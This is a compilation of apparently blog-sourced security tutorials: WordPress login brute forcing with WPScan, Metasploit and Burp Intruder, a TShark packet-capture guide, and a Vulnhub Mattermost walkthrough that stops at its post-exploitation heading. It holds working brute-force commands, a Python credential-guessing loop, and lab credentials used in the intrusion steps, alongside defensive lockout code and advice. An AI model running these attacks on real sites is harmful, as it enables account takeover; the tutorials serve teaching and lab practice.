Multiple Ways to Brute Force a WordPress Login


In this article you will learn how to recover a WordPress site's login credentials with three different brute-forcing tools: WPScan, Metasploit and Burp Suite Intruder.

Table of Content

·         Pre-requisites
·         WPScan
·         Metasploit
·         Burp Suite
·         How to avoid a Brute Force Attack?

Pre-requisites:

Target: WordPress
Attacker: Kali Linux (WPScan, Metasploit, Burp Suite Intruder)

WPScan

WPScan is a command-line black-box vulnerability scanner for WordPress. Security professionals and site owners use it to test their own installations: it enumerates users, plugins and themes, checks them against a vulnerability database, and can brute force the login. WPScan comes pre-installed on most security-focused Linux distributions and is also available as a WordPress plugin.
Here I am using a WordPress site hosted on localhost, as you can see in the image below.


While brute forcing you can use your own lists of common usernames and passwords or the ones shipped with Kali Linux. I have used the rockyou.txt password file, which comes with a standard Kali installation and contains 14,341,564 unique passwords.

wpscan --url http://192.168.1.100/wordpress/ -U users.txt -P /usr/share/wordlists/rockyou.txt

--url  the URL of the WordPress site to scan
-U     brute force only the supplied usernames, in our case the ones in users.txt (if you do not yet know valid usernames, run WPScan with -e u first to enumerate them)
-P     try every password from the supplied list, here rockyou.txt
The scan duration depends mainly on the size of the password list. Every username is tried against every password, so even a short user list multiplied by rockyou.txt means millions of requests, which will also degrade the site's performance if left running for a long time.


The screen shows the attack as a success with the username as admin and password as flower.

Metasploit

Metasploit comes pre-installed on Kali Linux, so our first step is to open the Metasploit console (msfconsole) and load the WordPress module used below.
This auxiliary module runs a username and password audit. It first validates the usernames (WordPress returns a different login error for an unknown username than for a wrong password, which is what makes this possible) and then tries the password list against each valid username.
msf > use auxiliary/scanner/http/wordpress_login_enum
msf auxiliary(wordpress_login_enum) > set RHOSTS 192.168.1.100
msf auxiliary(wordpress_login_enum) > set TARGETURI /wordpress
msf auxiliary(wordpress_login_enum) > set USER_FILE user.txt
msf auxiliary(wordpress_login_enum) > set PASS_FILE /pass.txt
msf auxiliary(wordpress_login_enum) > run
Once again the brute force succeeds with the credentials admin:flower, as the following screenshot shows.



Burp Suite

For this, install Burp Suite Community Edition or use the copy pre-installed on Kali Linux. Start Burp Suite, point your browser at its proxy, open the WordPress login page and turn Intercept on in the Proxy tab. Then submit any username and password of your choice on the login form. Burp will intercept the login request (not the response) before it reaches the server.


Look at the image below and notice the last line of the intercepted message: it shows the credentials I submitted, raj:raj, as the log (username) and pwd (password) form fields. Next, send the captured request to Intruder by right-clicking in the message editor and choosing Send to Intruder, or simply by pressing Ctrl+I. If you are not familiar with how Burp Intruder works, go through this article first ( https://www.hackingarticles.in/beginners-guide-burpsuite-payloads-part-1/ )


Now open the Intruder tab and you will see the request we sent as the base template. Select the Positions tab; by default several positions are already selected and marked with § characters. Anything between a pair of § characters is replaced by a payload. We do not need all of them, so click the Clear button at the bottom right of the editor window.

Next, select the values of the log and pwd parameters as shown in the screenshot and click the Add button to the right of the frame. This configures those two positions as payload insertion points. Now choose the attack type. As we have two payload positions I am choosing Cluster bomb: it puts the first payload set in the first position and the second payload set in the second position, and then iterates through every combination of the two sets. For example, with 1000 usernames and 1000 passwords it will send 1,000,000 requests.
The attack is started once both payload sets have been configured in the Payloads tab, as described next.


In the Payloads tab, open the Payload set drop-down; you will see the numbers 1 and 2. Select 1 for the first payload position (the username) and choose Simple list as the payload type. This type lets you configure a plain list of strings to use as payloads: you can add items manually with the text box and the Add button, paste a list from the clipboard, or load one from a file.


Similarly, select 2 for the second payload position (the password) and choose Runtime file as the payload type. This reads payloads from a file as the attack runs, which is useful for very large lists because the whole list never has to be held in memory. Add the path of a dictionary file containing passwords only, then click Start attack.




Intruder now tries every combination of the two payload sets as username and password, as you can see below. Watching the Status and Length columns, the admin/flower combination stands out with status 302 and length 1203, while every other combination returned 200 with a larger page. That is the tell-tale of a successful WordPress login: wp-login.php redirects (302) to wp-admin and sets the wordpress_logged_in cookie on success, but re-renders the login form (200) with an error message on failure. So the credentials are admin and flower. Sorting the results by Status or Length is the quickest way to spot the odd one out in a long attack.
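All three tools above do the same thing: send every username/password pair from the lists to wp-login.php and tell a success from a failure by the response. The following Python script, added here as an illustration and not taken from the article or from WPScan, Metasploit or Burp, models that logic offline: it builds the same POST body the browser submits, walks the pairs in cluster-bomb order, and classifies each response the way the 302-versus-200 observation in the Burp section does, stopping early when the site starts blocking. The target URL, the fake_wordpress stand-in and the credentials it accepts are constructed for the example; the send() callable is where a real HTTP client would go, against a system you are authorised to test.

```python
"""Added example: an offline model of the wp-login.php brute force that
WPScan, the Metasploit module and Burp Intruder perform above.  Not code
from the article or from any of those tools.  Assumptions: a stock
WordPress login form (fields log, pwd, wp-submit, redirect_to, testcookie);
success = 302 into wp-admin plus a wordpress_logged_in_* cookie; failure =
200 page containing <div id="login_error">.  fake_wordpress() is a
constructed stand-in for the server so the script runs without a target."""
from itertools import product
from urllib.parse import parse_qs, urlencode


def login_body(user: str, password: str, target: str) -> str:
    """The form body a browser submits; the two § positions in Burp are log and pwd."""
    return urlencode({
        "log": user, "pwd": password, "wp-submit": "Log In",
        "redirect_to": f"{target}/wp-admin/", "testcookie": "1",
    })


def classify(status: int, headers: dict, body: str) -> str:
    """Read the outcome from the response instead of eyeballing Status/Length."""
    if (status == 302 and "/wp-admin" in headers.get("Location", "")
            and "wordpress_logged_in_" in headers.get("Set-Cookie", "")):
        return "success"
    if status in (403, 429):              # lockout plugin, WAF or CAPTCHA stepped in
        return "blocked"
    if status == 200 and 'id="login_error"' in body:
        return "failure"
    return "unknown"                      # e.g. redirected to a 2FA prompt


def brute_force(send, usernames, passwords, target="http://192.168.1.100/wordpress"):
    """Cluster bomb: every username with every password, in that order.
    `send(body)` performs one POST to wp-login.php and returns (status, headers, body).
    Stops at the first success, or as soon as the site starts blocking us."""
    attempts = 0
    for user, pwd in product(usernames, passwords):
        attempts += 1
        outcome = classify(*send(login_body(user, pwd, target)))
        if outcome == "success":
            return {"found": (user, pwd), "attempts": attempts, "stopped": "success"}
        if outcome == "blocked":
            return {"found": None, "attempts": attempts, "stopped": "blocked"}
    return {"found": None, "attempts": attempts, "stopped": "exhausted"}


def fake_wordpress(valid=(("admin", "flower"),), lockout_after=None):
    """Constructed wp-login.php: accepts the pairs in `valid`; if lockout_after
    is set, answers 403 once that many failures have been seen (a lockout plugin)."""
    failures = [0]

    def send(body: str):
        form = parse_qs(body)
        user, pwd = form["log"][0], form["pwd"][0]
        if lockout_after is not None and failures[0] >= lockout_after:
            return 403, {}, "Too many failed login attempts"
        if (user, pwd) in valid:
            cookie = "wordpress_logged_in_0123abcd=admin%7C1700000000%7Ctoken%7Chash; HttpOnly"
            return 302, {"Location": form["redirect_to"][0], "Set-Cookie": cookie}, ""
        failures[0] += 1
        return 200, {}, '<div id="login_error"><strong>Error:</strong> The password you entered is incorrect.</div>'

    return send


if __name__ == "__main__":
    users, passwords = ["raj", "admin"], ["123456", "password", "flower"]
    print(brute_force(fake_wordpress(), users, passwords))
    print(brute_force(fake_wordpress(lockout_after=3), users, passwords))
```

The second run in the demo shows why the "blocked" outcome matters: once a lockout plugin answers 403, every further guess is wasted and merely confirms to the defender that an attack is under way.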


How to avoid a Brute Force attack?
One can certainly make these attacks impractical with a few precautionary measures:
Password Length: Treat 8 characters as the bare minimum and prefer considerably longer passwords or passphrases; there is no good reason to cap the length. Avoid the most common passwords (everything in rockyou.txt counts as common) and change a password promptly when you suspect it has been exposed.
Password Complexity: A password should mix UPPERCASE and lowercase letters, numbers and special characters, or better still be a long passphrase of several unrelated words rather than a single dictionary word. Length and unpredictability are what stretch the cracking time; a complex-looking password that appears in a leaked list is still cracked in seconds.

Limit Login Attempts: Limit the login attempts on your WordPress admin. For example, after three failed attempts, block that IP address for a period of time so it cannot make further attempts. Key the limit on the username as well as the IP, since attackers spread their attempts over many addresses, and remember that xmlrpc.php is an alternative login path: its system.multicall method lets a single request carry many credential guesses, so disable XML-RPC or cover it with the same limits.

Two Factor Authentication: The next way to be secure from brute forcing is two-factor authentication, or 2FA. The login then requires a second proof in addition to the password, such as a one-time code from an authenticator app, a code sent by SMS or e-mail, or a hardware security key, so a guessed password alone is not enough to get in.
Using Captcha: Installing a CAPTCHA on your WordPress login is fairly easy and it stops bots from running automated login scripts against your account.
Install a WordPress Firewall Plugin: Even unsuccessful brute force attacks can slow down your website or crash the server entirely. This is why it is important to block them, and for that you need a website firewall. A firewall filters out bad traffic and blocks it before it reaches your site.

Cloudflare: A well-known service that puts a protective shield (rate limiting, bot detection and a web application firewall) in front of your site against brute force attacks.

Install and Set Up a WordPress Backup Plugin: If everything else fails, you must have a backup plan!
There are several good WordPress backup plugins that let you schedule automatic backups.

Disabling directory browsing and limiting user enumeration (the ?author=N redirects and the /wp-json/wp/v2/users endpoint that tools like WPScan use to harvest usernames) deny attackers the valid usernames they need before they can even start; installing WordPress updates regularly closes known vulnerabilities in core and plugins.
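The lockout described under "Limit Login Attempts" comes down to a small piece of state on the server. Here is an added Python example, not from the article or from any WordPress plugin, of such a limiter: a sliding window of failures per key, a fixed lockout once the window overflows, and a gate in front of the password check that keys on both the client IP and the username, so that rotating source addresses does not reset the counter. The thresholds, the check_password callable and the IP addresses in the demo are constructed.

```python
"""Added example: the server-side state behind "Limit Login Attempts".  Not
code from the article or from any WordPress plugin.  A sliding window of
failures per key and a fixed lockout once it overflows; the gate in front
of the password check keys on both the client IP and the username, so
rotating source addresses does not reset the counter.  Thresholds, the
check_password callable and the addresses in the demo are constructed."""
from collections import defaultdict, deque


class LoginLimiter:
    def __init__(self, max_failures=3, window=300, lockout=900):
        self.max_failures = max_failures     # failures allowed inside `window`
        self.window = window                 # seconds over which failures are counted
        self.lockout = lockout               # seconds a key stays blocked
        self._failures = defaultdict(deque)  # key -> timestamps of recent failures
        self._blocked_until = {}             # key -> time the block lifts

    def is_blocked(self, key: str, now: float) -> bool:
        until = self._blocked_until.get(key)
        if until is None:
            return False
        if now >= until:                     # lockout expired: start with a clean slate
            del self._blocked_until[key]
            self._failures.pop(key, None)
            return False
        return True

    def record_failure(self, key: str, now: float) -> bool:
        """Count a failure; return True if it pushed the key into lockout."""
        recent = self._failures[key]
        recent.append(now)
        while recent and now - recent[0] > self.window:
            recent.popleft()
        if len(recent) >= self.max_failures:
            self._blocked_until[key] = now + self.lockout
            return True
        return False

    def record_success(self, key: str) -> None:
        self._failures.pop(key, None)


def attempt_login(limiter: LoginLimiter, check_password, ip: str, user: str,
                  password: str, now: float) -> str:
    """Gate one login attempt.  Returns 'ok', 'bad_credentials' or 'locked_out'.
    The check is refused while locked out even if the password is right, which
    is what stops the WPScan/Intruder runs above from ever seeing a 302."""
    keys = (f"ip:{ip}", f"user:{user}")
    if any(limiter.is_blocked(k, now) for k in keys):
        return "locked_out"
    if check_password(user, password):
        for k in keys:
            limiter.record_success(k)
        return "ok"
    for k in keys:
        limiter.record_failure(k, now)
    return "bad_credentials"


if __name__ == "__main__":
    lim = LoginLimiter(max_failures=3, window=300, lockout=900)
    check = lambda u, p: (u, p) == ("admin", "flower")      # constructed credential store
    script = [("10.0.0.5", "admin", "123456", 0), ("10.0.0.5", "admin", "password", 1),
              ("10.0.0.5", "admin", "qwerty", 2), ("10.0.0.5", "admin", "flower", 3),
              ("10.0.0.6", "admin", "flower", 4), ("10.0.0.5", "raj", "raj", 5),
              ("10.0.0.5", "admin", "flower", 903)]
    for ip, user, pwd, t in script:
        print(f"t={t:>4} {ip} {user}:{pwd} -> {attempt_login(lim, check, ip, user, pwd, t)}")
```

The demo script shows the two properties worth checking in any real plugin: the correct password is refused while the lockout is active, and a fresh source IP (10.0.0.6) is still locked out because the username key tripped too. Keying on the username alone would let an attacker lock legitimate users out on purpose, which is why both keys are used together.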

Thank you!   

Beginners Guide to TShark (Part 1)


In this article we will learn about TShark, a well-known network protocol analyser. It lets us capture packets from a live network, and it can also read and analyse packets previously saved to a capture file.

Table of content
·         Network traffic
·         Introduction to TShark
·         List interfaces
·         Capture traffic
·         Capture the interface in promiscuous mode
·         Capture the packet count
·         Read and Write in a file
·         Verbose mode
·         Output Formats
·         Difference between decoded packets and encoded packets
·         Converting a PDML file to an HTML page
·         Capturing packets of a particular port
·         Display filter

Network traffic
Network traffic (or data traffic) is the amount of data moving across a network at a given point in time. In computer networks that data travels as packets, and analysing those packets is the basis of network monitoring and detection: a sudden, unusual volume of traffic, or traffic to a host or port that should be quiet, is often the first sign of an attack, and a packet analyser such as TShark lets us see it before it is too late and respond.
Traffic volume is a term from traffic analysis: it is the measure of the total work the network has done, defined as the average traffic intensity multiplied by the period over which the packets were observed.
Introduction to TShark
TShark is a well-known and powerful command-line network analyser that is part of the Wireshark project. Its workflow is similar to tcpdump's, but it has Wireshark's protocol dissectors and filters behind it. TShark can capture the packet information of the different network layers and display it in several output formats.
TShark analyses real-time network traffic and can also read .pcap and .pcapng files, letting us dig into the details of the recorded connections and helping security professionals pin down network problems.
As a command-line tool TShark can do almost everything Wireshark does, just without the GUI. So let us launch it and explore its options. To see all the parameters, use the following command:
tshark -h

List interfaces
TShark can print a list of the interfaces whose traffic it can capture. Each interface is referred to by a serial number, followed by its name and, where available, a text description. Any of these can be passed to the -i parameter, which selects the interface to capture on. To list them, use the -D parameter as shown in the image below:
tshark -D


Capture traffic
Let's now try to capture traffic. We have several interfaces to choose from and you can pick whichever suits your needs; in our scenario we are going to use "eth0". Since we are testing on a controlled network we first need to generate some traffic, so in another terminal run a ping, and then start the capture by specifying the interface name with the -i parameter as shown in the image below:

tshark -i eth0

The capture shows the ICMP echo request and reply pairs generated by the ping, together with whatever else happens to be on the interface (for example a TCP three-way handshake belonging to another connection).
Promiscuous mode
In networking, promiscuous mode is a setting on the interface controller that makes it pass every frame it receives up to the host, instead of only the frames addressed to its own MAC address. It is normally used for packet sniffing, on a router or on a computer connected to a wired LAN. Two caveats: TShark (like Wireshark) puts the capture interface into promiscuous mode by itself unless you pass -p, and on a switched network you will still only see the frames the switch forwards to your port (broadcast, multicast and your own unicast traffic) unless you have a mirror/SPAN port. Setting the flag on the interface explicitly with ifconfig (or the newer "ip link set eth0 promisc on") does no harm and makes the intent visible. We will start by pinging a website and try to capture its packets.

Configure promiscuous mode with the following commands and capture again:
ifconfig eth0 promisc
tshark -i eth0


Packet count
TShark has a number of options that let us work more efficiently. One of them is -c, which stops the capture after exactly the number of packets we ask for and displays only those. It is a simple way to keep the captured output manageable.
tshark -i eth0 -c 10

As we can see in the image above, the capture stops after 10 packets.
Read and Write in a file
TShark can write captures to a file and read them back. The write option (-w) saves the raw packet data to a capture file (pcapng by default in current versions; add -F pcap if another tool needs the classic libpcap format), and the read option (-r) decodes a saved file and displays it in whatever way we ask. To write 10 packets to a file use the following command:
tshark -i eth0 -c 10 -w packets.pcap
And to read the file back use the following command:
tshark -r packets.pcap


Verbose mode
Verbose mode prints the full decoded detail of every packet (every protocol layer and field, the equivalent of expanding all the trees in Wireshark's packet details pane) rather than a one-line summary. The parameter for it is -V.
tshark -r packets.pcap -V


Output formats
For our convenience TShark has a -T option that writes the decoded packets in various output formats, so the output can be shaped into whatever is easiest to read or to feed to another tool. Giving -T a value it does not recognise makes it print the list of valid formats, so the following command is a quick way to see them all:
tshark -T x

PDML
PDML stands for Packet Details Mark-up Language, an XML-based format. The information it carries is equivalent to the verbose (-V) output we used earlier, just machine-readable. To produce it, type the following command:
tshark -r packets.pcap -T pdml

PS
PS stands for PostScript. The output is a one-line summary of each packet, or a multi-line detail view of each packet if -V is also given, formatted for printing. The one-liners are quick to read. For this, use the following command:
tshark -r packets.pcap -T ps

PSML
PSML stands for Packet Summary Mark-up Language. It is an XML-based format like PDML, but it carries only the summary columns for each packet rather than the full field detail. For this format type:
tshark -r packets.pcap -T psml

JSON
JSON stands for JavaScript Object Notation, an open standard text format readable by both humans and programs. In this mode TShark emits the same decoded field tree as PDML, but as JSON, which most scripting languages can load directly. To see the packets in this format, type:
tshark -r packets.pcap -T json


EK
EK is a newline-delimited JSON format intended for bulk import into Elasticsearch: each packet is preceded by an index action line so the output can be posted straight to the bulk API. For this format use the following command:
tshark -r packets.pcap -T ek

Text
Text is a human-readable one-line summary of each packet. It is the simplest of the formats and the default when no -T is given. For this, use the following command:
tshark -r packets.pcap -T text

Tabs
This option is similar to text except that it puts an ASCII horizontal tab (0x09) between the columns, which makes the output easy to split in scripts. To try it, type:
tshark -r packets.pcap -T tabs


Difference between decoded packets and encoded packets
When we write live packets to a capture file, TShark stores the raw bytes exactly as they arrived on the wire, plus a small per-packet header with the timestamp and length. To make sense of them they have to be decoded, and decoded representations such as PDML spell out every field with its name and value, so a decoded file is far larger than the capture it came from. To compare the sizes of the files we have produced, use the following command:
ls -lh packets.p*

As discussed, there is a large difference between the files: the .pcap holds the compact on-the-wire bytes, while the decoded formats trade size for readability.

Converting a PDML file to an HTML page
The main difference between Wireshark and TShark is that Wireshark is a GUI tool while TShark works on the command line, but with a little help we can still view our packets in a browser. First save the capture in PDML format, which is XML, using the following command:
tshark -r packets.pcap -T pdml > packets.xml
Wireshark ships an XSLT stylesheet for exactly this purpose at /usr/share/wireshark/pdml2html.xsl. We use the xsltproc tool to apply that stylesheet to our XML, which produces an HTML page that lays out the decoded fields neatly and hides the XML plumbing. To create the HTML use the following command:
xsltproc /usr/share/wireshark/pdml2html.xsl packets.xml > packets.html

To open the HTML page in the browser, as in the image above, use the following command:
firefox packets.html &



Capturing packets of a particular port
Often we only care about one service. The -f option takes a capture filter in BPF (tcpdump) syntax, which is applied as packets arrive, so packets that do not match are never captured at all; this keeps captures small and is the cheapest way to focus on one port. Here we capture five packets on TCP port 80 with the following command:
tshark -i eth0 -c 5 -f "tcp port 80"


Display filter
Display filters use Wireshark's own filter language and work on the decoded fields of a packet (http.request.method, ip.addr, tcp.flags.syn and so on), so they can express things a capture filter cannot. They are applied after capture or decode with the -Y option, to live traffic as well as to saved files. Note that -c limits the number of packets captured, not displayed, so with a display filter you may see fewer lines than you asked for.
In our scenario we combine both: a capture filter for port 80 and a display filter that keeps only HTTP GET requests, using the following command:
tshark -i eth0 -c 5 -f "tcp port 80" -Y 'http.request.method == "GET"'
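Both filter types above, and the "decoded versus encoded" point made earlier, are easier to see in code. The Python below is an added example (not from the article or from the Wireshark project) that builds a small classic-pcap capture in memory with struct.pack, decodes the Ethernet, IPv4 and TCP headers by hand, and then applies the equivalent of the capture filter "tcp port 80" and of the display filter http.request.method == "GET". The addresses, ports and HTTP text are made up, and the TCP checksum is left at zero.

```python
"""Added example: decode a classic libpcap capture by hand and apply, in
code, the two filter kinds tshark offers.  Not code from the article or
from the Wireshark project.  The capture is constructed in memory; the
addresses, ports and HTTP text are made up and TCP checksums are left zero."""
import socket
import struct

ETH_IPV4 = 0x0800
IPPROTO_TCP = 6
SYN, SYN_ACK, ACK, PSH_ACK = 0x02, 0x12, 0x10, 0x18


def ip_checksum(header: bytes) -> int:
    """RFC 791 one's-complement sum over the 20-byte IPv4 header (checksum field zeroed)."""
    total = sum(struct.unpack("!10H", header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def tcp_frame(src: str, dst: str, sport: int, dport: int, flags: int, payload: bytes = b"") -> bytes:
    """Ethernet II + IPv4 + TCP frame as it would appear on the wire."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, flags, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0x4000, 64,
                     IPPROTO_TCP, 0, socket.inet_aton(src), socket.inet_aton(dst))
    ip = ip[:10] + struct.pack("!H", ip_checksum(ip)) + ip[12:]
    eth = bytes.fromhex("001122334455") + bytes.fromhex("66778899aabb") + struct.pack("!H", ETH_IPV4)
    return eth + ip + tcp


def build_pcap(frames) -> bytes:
    """Classic pcap: 24-byte global header (magic, v2.4, snaplen, linktype 1 =
    Ethernet), then per packet a 16-byte record header and the raw bytes.
    This is all 'tshark -w' stores: no decoding, hence the small file."""
    out = bytearray(struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1))
    for i, data in enumerate(frames):
        out += struct.pack("<IIII", 1_700_000_000, i * 1000, len(data), len(data)) + data
    return bytes(out)


def decode_frame(data: bytes) -> dict:
    """Ethernet -> IPv4 -> TCP, the fields behind tshark's one-line summary."""
    pkt = {"len": len(data), "proto": None}
    if struct.unpack_from("!H", data, 12)[0] != ETH_IPV4:
        return pkt
    ihl = (data[14] & 0x0F) * 4
    pkt["proto"] = data[23]
    pkt["src"], pkt["dst"] = socket.inet_ntoa(data[26:30]), socket.inet_ntoa(data[30:34])
    if pkt["proto"] == IPPROTO_TCP:
        l4 = 14 + ihl
        pkt["sport"], pkt["dport"] = struct.unpack_from("!HH", data, l4)
        pkt["flags"] = data[l4 + 13]
        pkt["payload"] = data[l4 + (data[l4 + 12] >> 4) * 4:]
    return pkt


def parse_pcap(blob: bytes) -> list:
    """Walk the record headers; this is the 'read' side of tshark -r."""
    if struct.unpack_from("<I", blob, 0)[0] != 0xA1B2C3D4:
        raise ValueError("not a little-endian classic pcap (pcapng needs another reader)")
    pkts, off = [], 24
    while off < len(blob):
        _sec, _usec, incl_len, _orig_len = struct.unpack_from("<IIII", blob, off)
        off += 16
        pkts.append(decode_frame(blob[off:off + incl_len]))
        off += incl_len
    return pkts


def capture_filter_tcp_port(pkt: dict, port: int = 80) -> bool:
    """Equivalent of -f "tcp port 80": decidable from the headers alone."""
    return pkt["proto"] == IPPROTO_TCP and port in (pkt["sport"], pkt["dport"])


def display_filter_http_get(pkt: dict) -> bool:
    """Equivalent of -Y 'http.request.method == "GET"': needs the decoded
    payload, which a BPF capture filter never looks at."""
    payload = pkt.get("payload", b"")
    return payload.startswith(b"GET ") and b" HTTP/1." in payload


def sample_capture() -> bytes:
    """Constructed traffic: handshake plus GET/200 on port 80, and one SYN to 443."""
    c, s = "192.168.1.100", "203.0.113.10"
    frames = [
        tcp_frame(c, s, 40000, 80, SYN),
        tcp_frame(s, c, 80, 40000, SYN_ACK),
        tcp_frame(c, s, 40000, 80, ACK),
        tcp_frame(c, s, 40000, 80, PSH_ACK, b"GET / HTTP/1.1\r\nHost: example.test\r\n\r\n"),
        tcp_frame(s, c, 80, 40000, PSH_ACK, b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n"),
        tcp_frame(c, s, 40001, 443, SYN),
    ]
    return build_pcap(frames)


if __name__ == "__main__":
    for p in parse_pcap(sample_capture()):
        print(f'{p["src"]}:{p["sport"]} -> {p["dst"]}:{p["dport"]} len={p["len"]}',
              "[tcp port 80]" if capture_filter_tcp_port(p) else "",
              "[HTTP GET]" if display_filter_http_get(p) else "")
```

Run as a script it prints the six constructed packets: five match the port-80 capture filter, and only the one carrying "GET / HTTP/1.1" matches the display filter. Writing sample_capture() to disk and opening it with "tshark -r" will show the same summary lines, which is a handy way to check a hand-rolled parser against the real dissectors.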

Conclusion
This first article in the series has covered the basic commands and functionality of TShark. Get familiar with these features and stay tuned for the advanced features of TShark in our next article.
Author: Shubham Sharma is a Pentester, Cybersecurity Researcher and Enthusiast, contact here.

EnuBox: Mattermost: Vulnhub Walkthrough


In this article, we are going to crack the EnuBox: Mattermost Boot to Root Challenge and present a detailed walkthrough. The machine depicted in this Walkthrough is hosted on Vulnhub. Credit for making this machine goes to Avraham Cohen. Download this lab by clicking here.
Penetration Testing Methodology
·         Network Scanning
o   Netdiscover Scan
o   Nmap Scan
·         Enumeration
o   Browsing HTTP Service
o   Downloading README.md over TFTP
o   Logging in to Mattermost and enabling the Zoom plugin
o   Retrieving the message file over FTP
·         Exploitation
o   Connection via SSH
·         Post Exploitation
o   Transferring the secret binary
·         Privilege Escalation
o   Decompiling the secret binary with Ghidra
·         Reading Root Flag
Walkthrough
Network Scanning
We downloaded the virtual machine (.ova file), imported it into VMware Workstation and started it; the machine is assigned an IP address by the network's DHCP server. To begin we need the IP address of our target, and for that we use the following command, which lists the live hosts on the internal network:
netdiscover

We found the target's IP address: 192.168.0.110. The next step is to scan the target with Nmap to find its open ports and services, which tells us where to look next:
nmap -sT -sU -A 192.168.0.110

Here we ran an Nmap scan of both TCP and UDP ports with version detection. The scan shows TCP ports 21 (FTP), 22 (SSH), 80 (HTTP) and 3389 open, and UDP ports 68 (DHCP client), 69 (TFTP), 631 and 5353 (mDNS). That is the lay of the land; now let's get to enumeration.
Enumeration
We started with port 80 and opened it in the browser. We get the classic Access Forbidden banner. This is a custom error page, but it still leaks sensitive information: the error discloses the server's OS version, and it also mentions a probably sensitive file named README.md. Let's note both; they may be useful down the line.
http://192.168.0.110
Moving on, we also found another page hosted on port 8065. Let's take a look at it. It is a login panel, so this is probably our way into the application.
http://192.168.0.110:8065/login

From the Nmap scan we know the target is running a TFTP service. Let's take a look at it. TFTP has no authentication at all, so no credentials were asked for. We already know of a sensitive file named "README.md", so we tried to download it from the TFTP server, and the download succeeded. We then read the file to find a username and password.
tftp 192.168.0.110
get README.md
quit
cat README.md
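The "get README.md" above is a complete TFTP read exchange, and the reason it worked without credentials is that the protocol (RFC 1350) has no authentication step at all. The following Python, added here and not from the article, encodes both sides of that exchange against an in-memory stand-in for the server so it runs offline: the RRQ the client sends, the 512-byte DATA blocks the server answers with, the ACK for each block, and the short final block that ends the transfer. The file contents and the fake server are constructed.

```python
"""Added example: both sides of the TFTP read that `get README.md` performs
above, encoded by hand from RFC 1350.  Not code from the article; the
server is a constructed in-memory stand-in and no sockets are opened.
The security point is visible in the packet layout: there is no field in
which credentials could even be carried."""
import struct

RRQ, WRQ, DATA, ACK, ERROR = 1, 2, 3, 4, 5
BLOCK = 512                                   # fixed data block size without options


def build_rrq(filename: str, mode: str = "octet") -> bytes:
    """Read request: opcode 1 | filename | NUL | mode | NUL."""
    return struct.pack("!H", RRQ) + filename.encode() + b"\0" + mode.encode() + b"\0"


def build_ack(block: int) -> bytes:
    """ACK: opcode 4 | block number."""
    return struct.pack("!HH", ACK, block)


def parse(packet: bytes):
    """Split any TFTP packet into (opcode, fields)."""
    opcode, = struct.unpack_from("!H", packet, 0)
    if opcode in (RRQ, WRQ):
        filename, mode, _ = packet[2:].split(b"\0", 2)
        return opcode, {"filename": filename.decode(), "mode": mode.decode()}
    if opcode == DATA:
        return opcode, {"block": struct.unpack_from("!H", packet, 2)[0], "data": packet[4:]}
    if opcode == ACK:
        return opcode, {"block": struct.unpack_from("!H", packet, 2)[0]}
    if opcode == ERROR:
        return opcode, {"code": struct.unpack_from("!H", packet, 2)[0],
                        "message": packet[4:-1].decode()}
    raise ValueError(f"unknown TFTP opcode {opcode}")


class FakeTftpServer:
    """Constructed server: hands out any file it has to anyone who names it."""

    def __init__(self, files: dict):
        self.files = files
        self.current = b""

    def handle(self, packet: bytes) -> bytes:
        opcode, f = parse(packet)
        if opcode == RRQ:
            if f["filename"] not in self.files:
                return struct.pack("!HH", ERROR, 1) + b"File not found\0"
            self.current = self.files[f["filename"]]
            return self._data(1)
        if opcode == ACK:
            return self._data(f["block"] + 1)
        return struct.pack("!HH", ERROR, 4) + b"Illegal TFTP operation\0"

    def _data(self, block: int) -> bytes:
        """DATA: opcode 3 | block | up to 512 bytes; a short block means 'last'."""
        chunk = self.current[(block - 1) * BLOCK: block * BLOCK]
        return struct.pack("!HH", DATA, block) + chunk


def tftp_get(server: FakeTftpServer, filename: str) -> bytes:
    """Client side of `get <filename>`: RRQ, then ACK every DATA block until
    one arrives shorter than 512 bytes (possibly empty, for exact multiples)."""
    reply = server.handle(build_rrq(filename))
    received = bytearray()
    while True:
        opcode, f = parse(reply)
        if opcode == ERROR:
            raise FileNotFoundError(f'{f["code"]}: {f["message"]}')
        if opcode != DATA:
            raise ValueError(f"unexpected opcode {opcode}")
        received += f["data"]
        if len(f["data"]) < BLOCK:
            return bytes(received)
        reply = server.handle(build_ack(f["block"]))


if __name__ == "__main__":
    server = FakeTftpServer({"README.md": b"constructed readme contents\n" * 40})
    print(build_rrq("README.md"))                     # the bytes the tftp client puts on UDP/69
    print(len(tftp_get(server, "README.md")), "bytes received")
```

Because the only inputs to the server are a filename and a mode, the defensive options are equally simple: do not expose TFTP beyond the devices that need it, and never put anything sensitive in its served directory.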
We went back to the Login Panel that we found earlier and entered the following credentials.
Username: admin
Password: ComplexPassword0!
After logging in to the application we see a number of posts on the main page. Reading them, we noticed that the word "zoom" kept being used in unusual ways, like "Let's zoom" and "Zoom me", much as one would say "Let's text" or "Text me". This suggested that Zoom was some kind of messaging module. Mattermost clearly adds and removes functionality through plugins, so we set out to find a plugin named "zoom".
To manage plugins, we go to the panel with the username on the left and click the menu button, which opens a drop-down menu. Among a number of other options there is "System Console", which is worth checking out.
In the System Console there are many options, but our search was focused on the Plugins panel. Under it we find the Zoom plugin.
Clicking the Zoom plugin opens its configuration page. The plugin was disabled by default, but as we are admin we have the authority to enable it. After enabling it we see that the plugin has a URL configured. It points at localhost because the setting was written from the server's own point of view, so we replaced localhost with the IP address of the target machine.
After fixing the URL we browsed to it and found a message saying that the FTP credentials help the admin edit and manage files. This gives us the FTP credentials:
Username: ftpuser
Password: ftppassword
Let's log in to the machine with these FTP credentials. We use the dir command to list the files, and after some enumeration we find a file named message.
ftp 192.168.0.110
ftpuser
ftppassword
dir
cd users
dir
cd mattermost
dir
get message
bye
Exploitation
Let's take a look at the message file we pulled from the FTP server. It says "Welcome!!".
After some thinking and tinkering with the application we figured out that the text inside the message file is the password of the SSH user mattermost. We SSHed into the machine with the following credentials. After logging in we start enumerating by listing the directories. There is a README.md file and a binary named secret. The README says there is a secret key that is needed to proceed. We ran the secret binary, it asked for the secret key, and we entered the key from the README, but it replied that the key had expired.
Username: mattermost
Password: Welcome!!
cat message
ssh mattermost@192.168.0.110
ls
cd Desktop/
ls
cat README.md
./secret
Post Exploitation
